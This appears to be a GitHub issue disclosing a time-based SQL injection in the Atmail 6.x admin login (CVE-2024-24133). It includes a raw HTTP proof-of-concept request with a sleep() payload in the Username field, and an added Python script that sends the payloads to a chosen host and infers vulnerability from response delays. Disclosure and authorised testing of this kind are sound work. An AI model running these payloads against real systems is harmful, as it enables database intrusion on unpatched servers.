Hebing123 / cve


SQL Injection Vulnerability in Atmail 6.6.0 #16

Open Hebing123 opened 10 months ago

Hebing123 commented 10 months ago

Summary

On January 12, we tested Atmail 6.6.0 and Atmail 6.3.0 and discovered SQL injection vulnerabilities; versions newer than 6.6.0 may also be affected.

The username parameter during admin login is at risk of SQL injection.

Details

We can prove this with delayed SQL injection, which we tested on versions 6.6.0 and 6.3.0; both proved to have SQL injection vulnerabilities.

Proof of Concept (POC)

```http
POST /index.php/admin/index/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://ip:port/
Content-Length: 153
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ip:port
Connection: Keep-alive

Language=ca&Password=1&Username=admin'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&login=1&send=1&server=https://ip:port/
```

As shown in the figure, a delay of 6 seconds proves that the injected SQL statement sleep(6) has been executed. [image]

As shown in the figure, a delay of 10 seconds proves that the injected SQL statement sleep(10) has been executed. [image]

Impact

  1. Leakage of user privacy information stored in the database;
  2. Tampering with some web pages by operating on the database;
  3. Modifying the value of some fields in the database, embedding a web trojan link, and carrying out a trojan attack;
  4. Malicious operation of the database server and tampering with the system administrator account;
  5. The database server provides operating system support, so that attackers can modify or control the operating system.
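
The following is an added example (not part of Hebing123's report and not Atmail's code) that turns the PoC above into a repeatable time-based check: it sends a benign login, then the same request with sleep(6) and sleep(10) payloads, and only reports the target as vulnerable when each response is delayed by at least the requested sleep relative to the baseline. The base URL, the `send` transport and the one-second tolerance are assumptions; the constructed `simulated_send` stands in for a server so the file runs offline.

```python
"""Time-based blind SQL injection check for the Atmail admin login PoC.

Added example, not the report author's code. Assumptions (not from the
report): the caller supplies the base URL, the tolerance is a heuristic,
and simulated_send() is a constructed stand-in for a real server.
"""
import re
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict

LOGIN_PATH = "/index.php/admin/index/login"  # path from the PoC request


def time_based_payload(seconds: int, marker: str = "admin") -> str:
    """Build the PoC's conditional-delay payload for a given sleep length.

    On MySQL/MariaDB now()=sysdate() holds within one statement, so IF()
    takes the sleep() branch; the surrounding XOR(...) keeps the quotes
    balanced so the statement still parses."""
    return f"{marker}'XOR(if(now()=sysdate(),sleep({seconds}),0))XOR'Z"


def build_login_body(username: str, server: str) -> bytes:
    """Form body with the same fields as the PoC; only Username varies."""
    fields = {
        "Language": "ca",
        "Password": "1",
        "Username": username,
        "login": "1",
        "send": "1",
        "server": server,
    }
    return urllib.parse.urlencode(fields).encode()


def http_send(base_url: str, timeout: float = 30.0) -> Callable[[str], float]:
    """Real transport: POST the login form and return elapsed seconds.

    The timeout must exceed the longest sleep() you intend to request."""
    def send(username: str) -> float:
        req = urllib.request.Request(
            base_url + LOGIN_PATH,
            data=build_login_body(username, base_url + "/"),
            method="POST",
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest",
            },
        )
        start = time.monotonic()
        try:
            urllib.request.urlopen(req, timeout=timeout).read()
        except urllib.error.HTTPError:
            pass  # a 4xx/5xx still counts; only the timing matters
        return time.monotonic() - start
    return send


def simulated_send(vulnerable: bool, base_latency: float = 0.2) -> Callable[[str], float]:
    """Constructed offline stand-in for a server.

    Pretends to take base_latency seconds, plus N seconds when the
    username carries sleep(N) and the simulated target is vulnerable.
    No real waiting happens; it just reports the elapsed time."""
    def send(username: str) -> float:
        match = re.search(r"sleep\((\d+)\)", username)
        extra = int(match.group(1)) if (match and vulnerable) else 0
        return base_latency + extra
    return send


def check_time_based_sqli(send: Callable[[str], float],
                          delays=(6, 10), tolerance: float = 1.0) -> Dict:
    """Compare a benign login against injected sleep() payloads.

    Reports vulnerable only if every injected request took at least
    (delay - tolerance) seconds longer than the baseline, so a uniformly
    slow server does not produce a false positive and the delay must
    track the value we asked for."""
    baseline = send("admin")
    samples = {d: send(time_based_payload(d)) for d in delays}
    vulnerable = all(samples[d] - baseline >= d - tolerance for d in delays)
    return {"baseline": baseline, "samples": samples, "vulnerable": vulnerable}


if __name__ == "__main__":
    import sys
    # Usage: python check.py https://ip:port   (target is an assumption)
    if len(sys.argv) == 2:
        print(check_time_based_sqli(http_send(sys.argv[1].rstrip("/"))))
    else:
        print(check_time_based_sqli(simulated_send(vulnerable=True)))
```

Run it with a base URL to test a real host you are authorised to assess; without arguments it exercises the simulated server. Two distinct delays are used on purpose: a single slow response can be network jitter, while responses that lengthen by exactly the requested amount are the injected sleep() executing.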
Hebing123 commented 10 months ago

According to the manufacturer, the Atmail 6 was "retired" on June 30, 2014. As of this date, no further security improvements, bug fixes, or customer support are provided with this version of the product.

According to statistics from a cyberspace mapping system, there are still more than 10k instances of this system exposed on the network!

Therefore, I disclosed this report in the hope that users of the system will be able to fix it in time.

Hebing123 commented 9 months ago

This is the vulnerability exploitation reference for CVE-2024-24133.